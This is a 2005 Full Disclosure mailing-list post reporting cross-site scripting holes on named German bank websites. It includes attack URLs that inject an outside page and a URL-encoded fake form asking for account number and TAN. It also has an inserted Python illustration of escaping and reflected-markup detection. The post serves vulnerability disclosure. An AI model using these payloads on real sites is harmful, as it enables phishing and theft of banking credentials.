Full Disclosure mailing list archives
CSS (Cross Site Scripting) on Germany's second largest financial institute's ebanking portal (Volksbank Raiffeisenbank)
From: Constantin Hofstetter <constantin.hofstetter () gmail com>
Date: Thu, 22 Dec 2005 21:02:28 +0100
I emailed the Administrators 2 months ago - the only response I got was something like: "We will look into it, but we may or may not change anything on the page - who knows; we won't tell you!". I called them and the guy on the phone laughed at me.

Here are the links / examples:

*Original:*
https://www.vr-ebanking.de/index.php?RZBK=0280 [vr-ebanking.de]

*MY Version (CSS):*
https://www.vr-ebanking.de/help;jsessionid=XA?Action=SelectMenu&SMID=EigenesOrderbuch&MenuName=&InitHref=http://www.consti.de/secure <https://www.vr-ebanking.de/help;jsessionid=XA?Action=SelectMenu&SMID=EigenesOrderbuch&MenuName=&InitHref=http://www.consti.de/secure> [vr-ebanking.de]

*Forgery --> Imitation*

My local Bank's Website:
http://voba-lindenberg.de/content_suche.php?search=<b>Mysql_Injection?</b>' <http://voba-lindenberg.de/content_suche.php?search=%3Cdiv%20style=z-index:2000;position:absolute;margin-top:-52>

The Institute that should secure the financial institute's websites:
http://www.fiducia.de/__C1256CF50056F303.nsf/SearchView/!SearchView&query=AA%22%3E<b>Whatever_You_Like_</b>&SearchMax=10 <http://www.fiducia.de/__C1256CF50056F303.nsf/SearchView/%21SearchView&query=AA%22%3E%3Cdiv%20style=z-index:2000;position:absolute;width:90%25;height:90%25;margin:-150px;padding:60px;background:white;%3E%3Ch1%3EKonto%20Erneuern%3C/h1%3E%3Cp%3E%3Ctable%3E%3Ctr%3E%3Ctd%3E%3Cb%3EKontonummer:%3C/b%3E%3C/td%3E%3Ctd%3E%3Cinput%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%3E%3Cb%3ETAN:%3C/b%3E%3C/td%3E%3Ctd%3E%3Cinput%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%3E%3Cbr%3E%3C/td%3E%3Ctd%3E%3Cinput%20type=submit%20value=Aktivieren%3E%3C/td%3E%3C/tr%3E%3C/table%3E%3C/div%3E%3Cinput%20value=%22&SearchMax=10>

and so on..
The vr-ebanking site is used by millions of people each day for their daily financial stuff (ebanking) - someone (phishers) could easily use the CSS (Cross Site Scripting) to create real looking websites "within" the domain; More importantly they could create a website that does all the true login stuff (in the background) but sniffs out the TANs and PINs (think snoopy.in, think curl, think a mysql database full of working tans!).

This is not looking too good for my bank, but they don't listen -

--
Constantin Hofstetter
http://www.consti.de
Constantin.Hofstetter () gmail com
mailmespam () gmail com
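The links above all reflect a search parameter straight back into the page. As an added illustration that is not part of the original message (host, payload and template strings are placeholders I made up), here is the same reflection in its vulnerable and hardened forms, with a check a defender can run against a rendered page to see whether attacker-controlled markup survived encoding:

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# Two reflection contexts typical of search pages like those linked above:
# the term echoed into the body text, and echoed back into the search box.
BODY_TEMPLATE = '<p>Results for: {q}</p>'
ATTR_TEMPLATE = '<input name="search" value="{q}">'


def search_param(url: str) -> str:
    """Extract the raw 'search' query parameter, percent-decoded."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get("search", [""])[0]


def render_vulnerable(query: str) -> str:
    """Reflect the term unescaped into both contexts: the flaw the post describes."""
    return BODY_TEMPLATE.format(q=query) + ATTR_TEMPLATE.format(q=query)


def render_hardened(query: str) -> str:
    """HTML-escape before insertion. quote=True also encodes '"', so a term
    like  ">...  cannot close the value attribute and inject new tags."""
    safe = html.escape(query, quote=True)
    return BODY_TEMPLATE.format(q=safe) + ATTR_TEMPLATE.format(q=safe)


TAG_RE = re.compile(r"<[^>]+>")


def markup_survives(query: str, page: str) -> bool:
    """Detection check: does any tag-like token from the input appear verbatim
    in the output? True means the page reflects user markup unencoded."""
    return any(tag in page for tag in TAG_RE.findall(query))


def main() -> None:
    # Constructed URL in the shape of the search links in the post.
    url = "http://bank.example/content_suche.php?search=%22%3E%3Cb%3Etest%3C/b%3E"
    term = search_param(url)
    for name, render in (("vulnerable", render_vulnerable), ("hardened", render_hardened)):
        print(f"{name}: markup survives = {markup_survives(term, render(term))}")


if __name__ == "__main__":
    main()
```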
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/